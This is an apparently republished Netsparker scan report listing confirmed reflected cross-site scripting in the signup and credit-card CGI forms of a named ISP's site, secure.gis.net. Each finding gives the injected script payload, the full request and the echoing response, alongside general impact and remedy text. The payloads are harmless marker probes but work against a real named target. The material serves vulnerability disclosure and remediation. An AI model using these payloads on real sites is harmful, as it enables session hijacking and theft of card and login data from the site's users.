XSS.CX Research Blog

The DORK Report

NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
https://secure.gis.net/
SCAN DATE
9/24/2010 9:41:09 PM
REPORT DATE
9/25/2010 7:10:21 AM
SCAN DURATION
03:02:39.1093750

28 identified
27 confirmed
0 critical
2 informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

VULNERABILITIES

Vulnerabilities
MEDIUM
86 %
LOW
7 %
INFORMATION
7 %
Cross-site Scripting

Cross-site Scripting

24 TOTAL
MEDIUM
CONFIRMED
24
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the current user's session or altering the page's HTML on the fly to change its appearance and steal the user's credentials. It happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this limits the direct impact, it still lets attackers hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the user.

Before sanitizing user input, define a white-list of the characters you expect and accept. This list need only be defined once and should be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST '"--><script>alert(0x000248)</script>
CCNUM POST 3
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST Business_DSL 3Mbps
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo_business.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 695
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000248)%3c%2fscript%3e&CCNUM=3&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=Business_DSL+3Mbps&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:52:42 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000248)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x000249)</script>
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST Business_DSL 3Mbps
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo_business.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 695
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x000249)%3c%2fscript%3e&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=Business_DSL+3Mbps&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:52:45 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x000249)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
CARDTYPE POST '"--><script>alert(0x000543)</script>
CCNUM POST 3
CITY POST 3
COMMENTS POST 3
COMPANY POST 3
EMAIL POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
INTERNETTYPE POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
monthlytotal4 POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
onetimetotal POST 3
onetimetotal0 POST 3
onetimetotal1 POST 3
onetimetotal2 POST 0
onetimetotal3 POST 0.00
pcphone POST 0.00
PHONE POST 3
PHONETYPE POST Sipura Adapter
RATECENTER POST 3
REQUESTEDSTATE POST MA
SOURCE POST 3
STATE POST 3
STREET POST 3
tosagree POST agree
ZIP POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 638
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000543)%3c%2fscript%3e&CCNUM=3&CITY=3&COMMENTS=3&COMPANY=3&EMAIL=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&INTERNETTYPE=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&monthlytotal4=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&onetimetotal=3&onetimetotal0=3&onetimetotal1=3&onetimetotal2=0&onetimetotal3=0.00&pcphone=0.00&PHONE=3&PHONETYPE=Sipura+Adapter&RATECENTER=3&REQUESTEDSTATE=MA&SOURCE=3&STATE=3&STREET=3&tosagree=agree&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:17:06 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000543)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x000544)</script>
CITY POST 3
COMMENTS POST 3
COMPANY POST 3
EMAIL POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
INTERNETTYPE POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
monthlytotal4 POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
onetimetotal POST 3
onetimetotal0 POST 3
onetimetotal1 POST 3
onetimetotal2 POST 0
onetimetotal3 POST 0.00
pcphone POST 0.00
PHONE POST 3
PHONETYPE POST Sipura Adapter
RATECENTER POST 3
REQUESTEDSTATE POST MA
SOURCE POST 3
STATE POST 3
STREET POST 3
tosagree POST agree
ZIP POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 638
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x000544)%3c%2fscript%3e&CITY=3&COMMENTS=3&COMPANY=3&EMAIL=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&INTERNETTYPE=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&monthlytotal4=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&onetimetotal=3&onetimetotal0=3&onetimetotal1=3&onetimetotal2=0&onetimetotal3=0.00&pcphone=0.00&PHONE=3&PHONETYPE=Sipura+Adapter&RATECENTER=3&REQUESTEDSTATE=MA&SOURCE=3&STATE=3&STREET=3&tosagree=agree&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:17:08 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x000544)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST '"--><script>alert(0x000721)</script>
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 164
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE='%22--%3e%3cscript%3enetsparker(0x000721)%3c%2fscript%3e&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:23 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000721)</script>"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST '"--><script>alert(0x000724)</script>
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY='%22--%3e%3cscript%3enetsparker(0x000724)%3c%2fscript%3e&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:26 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000724)</script>"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 
CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST '"--><script>alert(0x000727)</script>
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN='%22--%3e%3cscript%3enetsparker(0x000727)%3c%2fscript%3e&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:28 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000727)</script>"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 
CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST '"--><script>alert(0x00072A)</script>
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 155
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL='%22--%3e%3cscript%3enetsparker(0x00072A)%3c%2fscript%3e&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:30 GMT
Server: Apache
Connection: close
Content-Type: text/html


